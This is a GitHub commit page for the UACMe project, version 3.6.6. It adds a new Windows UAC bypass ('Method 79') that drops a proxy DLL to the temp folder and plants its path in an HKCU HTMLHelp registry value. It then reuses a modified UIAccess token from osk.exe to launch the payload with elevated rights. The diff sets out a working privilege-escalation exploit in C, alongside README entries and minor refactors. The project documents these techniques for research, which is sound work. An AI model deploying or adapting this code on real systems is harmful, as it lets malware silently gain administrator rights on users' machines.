Skip to content

Commit

Permalink
v 3.6.6
Browse files Browse the repository at this point in the history
Method 79 added;
Readme updated.
  • Loading branch information
hfiref0x committed Apr 8, 2024
1 parent 90cb9bc commit 6e36b58
Show file tree
Hide file tree
Showing 21 changed files with 387 additions and 69 deletions.
2 changes: 1 addition & 1 deletion LICENSE.md
Original file line number Diff line number Diff line change
@@ -1,4 +1,4 @@
Copyright (c) 2014 - 2023, UACMe Project
Copyright (c) 2014 - 2024, UACMe Project

Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
Expand Down
13 changes: 12 additions & 1 deletion README.md
Original file line number Diff line number Diff line change
Expand Up @@ -804,6 +804,16 @@ First parameter is number of method to use, second is optional command (executab
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.5
79. Author: James Forshaw and Stefan Kanthak
* Type: GUI Hack
* Method: UIPI bypass with token modification
* Target(s): \system32\osk.exe, \system32\mmc.exe
* Component(s): Attacker defined
* Implementation: ucmTokenModUIAccessMethod2
* Works from: Windows 7 (7600)
* Fixed in: unfixed :see_no_evil:
* How: -
* Code status: added in v3.6.6

</details>

Expand Down Expand Up @@ -916,9 +926,10 @@ https://devblogs.microsoft.com/oldnewthing/20160816-00/?p=94105
* UAC bypass through .Net Deserialization vulnerability in eventvwr.exe, https://twitter.com/orange_8361/status/1518970259868626944
* Advanced Windows Task Scheduler Playbook - Part.2 from COM to UAC bypass and get SYSTEM directly, http://www.zcgonvh.com/post/Advanced_Windows_Task_Scheduler_Playbook-Part.2_from_COM_to_UAC_bypass_and_get_SYSTEM_dirtectly.html
* Bypassing UAC with SSPI Datagram Contexts, https://splintercod3.blogspot.com/p/bypassing-uac-with-sspi-datagram.html
* Mitigate some Exploits for Windows’® UAC, https://skanthak.hier-im-netz.de/uacamole.html

# Authors

(c) 2014 - 2023 UACMe Project
(c) 2014 - 2024 UACMe Project

[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fhfiref0x%2FUACME&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://hits.seeyoufarm.com)
Binary file modified Source/Akagi/Resource.rc
Binary file not shown.
19 changes: 13 additions & 6 deletions Source/Akagi/methods/methods.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2023
* (C) COPYRIGHT AUTHORS, 2015 - 2024
*
* TITLE: METHODS.C
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* UAC bypass dispatch.
*
Expand Down Expand Up @@ -149,7 +149,8 @@ UCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {
{ MethodVFServerDiagProf, { NT_WIN7_RTM, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodIscsiCpl, { NT_WIN7_RTM, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },
{ MethodAtlHijack, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },
{ MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE }
{ MethodSspiDatagram, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },
{ MethodTokenModUIAccess, { NT_WIN10_19H1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE }
};

/*
Expand Down Expand Up @@ -582,8 +583,14 @@ UCM_API(MethodShellSdctl)

UCM_API(MethodTokenModUIAccess)
{
return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
Parameter->PayloadSize);
if (Parameter->Method == UacMethodTokenModUiAccess) {
return ucmTokenModUIAccessMethod(Parameter->PayloadCode,
Parameter->PayloadSize);
}
else {
return ucmTokenModUIAccessMethod2(Parameter->PayloadCode,
Parameter->PayloadSize);
}
}

UCM_API(MethodEditionUpgradeManager)
Expand Down
7 changes: 4 additions & 3 deletions Source/Akagi/methods/methods.h
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2023
* (C) COPYRIGHT AUTHORS, 2014 - 2024
*
* TITLE: METHODS.H
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* Prototypes and definitions for UAC bypass methods table.
*
Expand Down Expand Up @@ -98,6 +98,7 @@ typedef enum _UCM_METHOD {
UacMethodIscsiCpl, //+
UacMethodAtlHijack, //+
UacMethodSspiDatagram, //+
UacMethodTokenModUiAccess2, //+
UacMethodMax,
UacMethodInvalid = 0xabcdef
} UCM_METHOD;
Expand Down
10 changes: 7 additions & 3 deletions Source/Akagi/methods/routines.h
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2014 - 2023
* (C) COPYRIGHT AUTHORS, 2014 - 2024
*
* TITLE: ROUTINES.H
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 22 Sep 2023
* DATE: 03 Apr 2024
*
* Prototypes of methods for UAC bypass methods table.
*
Expand Down Expand Up @@ -145,6 +145,10 @@ NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize);

NTSTATUS ucmDebugObjectMethod(
_In_ LPWSTR lpszPayload);

Expand Down
111 changes: 99 additions & 12 deletions Source/Akagi/methods/tyranid.c
Original file line number Diff line number Diff line change
Expand Up @@ -176,7 +176,9 @@ NTSTATUS ucmDiskCleanupEnvironmentVariable(
*/
BOOL ucmxTokenModUIAccessMethodInitPhase(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName
)
{
BOOL bResult = FALSE;
Expand All @@ -188,32 +190,35 @@ BOOL ucmxTokenModUIAccessMethodInitPhase(
//
if (supReplaceDllEntryPoint(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS2,
EntryPointName,
TRUE))
{
//
// Drop modified Fubuki to the %temp%
//
RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);
_strcat(szBuffer, PayloadFileName);
bResult = supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize);
}

return bResult;
}

/*
* ucmTokenModUIAccessMethod
* ucmxTokenModUIAccessExec
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod(
NTSTATUS ucmxTokenModUIAccessExec(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
_In_ DWORD ProxyDllSize,
_In_ LPCSTR EntryPointName,
_In_ LPCWSTR PayloadFileName,
_In_ UCM_METHOD Method
)
{
NTSTATUS Status = STATUS_ACCESS_DENIED;
Expand All @@ -236,8 +241,13 @@ NTSTATUS ucmTokenModUIAccessMethod(
//
// Tweak and drop payload to %temp%.
//
if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll, ProxyDllSize))
if (!ucmxTokenModUIAccessMethodInitPhase(ProxyDll,
ProxyDllSize,
EntryPointName,
PayloadFileName))
{
break;
}

//
// Spawn OSK.exe process.
Expand Down Expand Up @@ -308,10 +318,12 @@ NTSTATUS ucmTokenModUIAccessMethod(
_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);

if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
if (Method == UacMethodTokenModUiAccess) {
if (g_ctx->OptionalParameterLength == 0)
lpszPayload = g_ctx->szDefaultPayload;
else
lpszPayload = g_ctx->szOptionalParameter;
}

if (CreateProcessAsUser(hDupToken,
szBuffer, //application
Expand Down Expand Up @@ -346,12 +358,87 @@ NTSTATUS ucmTokenModUIAccessMethod(
if (pIntegritySid) RtlFreeSid(pIntegritySid);

_strcpy(szBuffer, g_ctx->szTempDirectory);
_strcat(szBuffer, PKGMGR_EXE);
_strcat(szBuffer, PayloadFileName);
DeleteFile(szBuffer);

return Status;
}

/*
* ucmTokenModUIAccessMethod
*
* Purpose:
*
* Obtain token from UIAccess application, modify it and reuse for UAC bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
return ucmxTokenModUIAccessExec(ProxyDll, ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS2, PKGMGR_EXE,
UacMethodTokenModUiAccess);
}

/*
* ucmTokenModUIAccessMethod2
*
* Purpose:
*
* Variant inspired by Stefan Kanthak findings. Based on same tyranid UIAccess bypass.
*
*/
NTSTATUS ucmTokenModUIAccessMethod2(
_In_ PVOID ProxyDll,
_In_ DWORD ProxyDllSize
)
{
HKEY hKey;
LRESULT lResult;
NTSTATUS Status = STATUS_ACCESS_DENIED;
SIZE_T sz;
WCHAR szPayload[MAX_PATH * 2];

_strcpy(szPayload, g_ctx->szTempDirectory);
_strcat(szPayload, THEOLDNEWTHING);
_strcat(szPayload, TEXT(".dll"));

if (supWriteBufferToFile(szPayload, ProxyDll, ProxyDllSize)) {

hKey = NULL;
lResult = RegCreateKeyEx(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR, 0, NULL,
REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, NULL);
if (lResult == ERROR_SUCCESS) {

sz = (1 + _strlen(szPayload)) * sizeof(WCHAR);
lResult = RegSetValueEx(hKey,
T_LOCATION,
0,
REG_SZ,
(BYTE*)szPayload,
(DWORD)sz);

if (lResult == ERROR_SUCCESS) {

Status = ucmxTokenModUIAccessExec(ProxyDll,
ProxyDllSize,
FUBUKI_ENTRYPOINT_UIACCESS3,
PKGMGR_EXE,
UacMethodTokenModUiAccess2);

}

RegCloseKey(hKey);
}

RegDeleteKey(HKEY_CURRENT_USER, T_HTMLHELP_AUTHOR);
DeleteFile(szPayload);
}
return Status;
}

/*
* ucmxCreateProcessFromParent
*
Expand Down
8 changes: 4 additions & 4 deletions Source/Akagi/methods/zcgonvh.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2023
* (C) COPYRIGHT AUTHORS, 2020 - 2024
*
* TITLE: ZCGONVH.C
*
* VERSION: 3.63
* VERSION: 3.66
*
* DATE: 11 Jan 2023
* DATE: 03 Apr 2024
*
* UAC bypass methods based on zcgonvh original work.
*
Expand Down Expand Up @@ -471,7 +471,7 @@ HRESULT ucmxTriggerDiagProfile(
} while (FALSE);

if (methodName)
SysFreeString(methodName);
SysFreeString((BSTR)methodName);

if (pDispatch) {
pDispatch->lpVtbl->Release(pDispatch);
Expand Down
12 changes: 8 additions & 4 deletions Source/Akagi/sup.c
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015 - 2023
* (C) COPYRIGHT AUTHORS, 2015 - 2024
*
* TITLE: SUP.C
*
* VERSION: 3.65
* VERSION: 3.66
*
* DATE: 25 Sep 2023
* DATE: 03 Apr 2024
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
Expand Down Expand Up @@ -2842,7 +2842,11 @@ NTSTATUS supWaitForGlobalCompletionEvent(
LARGE_INTEGER liDueTime;

if (g_ctx->SharedContext.hCompletionEvent) {
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(200000, 10000);
#ifdef _DEBUG
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(10000, 10000);
#else
liDueTime.QuadPart = -(LONGLONG)UInt32x32To64(100000, 10000);
#endif
return NtWaitForSingleObject(g_ctx->SharedContext.hCompletionEvent, FALSE, &liDueTime);
}

Expand Down
2 changes: 1 addition & 1 deletion Source/Akagi/uacme.vcxproj.user
Original file line number Diff line number Diff line change
Expand Up @@ -39,7 +39,7 @@
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='DebugConsole|x64'">
<LocalDebuggerCommandArguments>78</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>79</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
Binary file modified Source/Akatsuki/version.rc
Binary file not shown.
Loading

0 comments on commit 6e36b58

Please sign in to comment.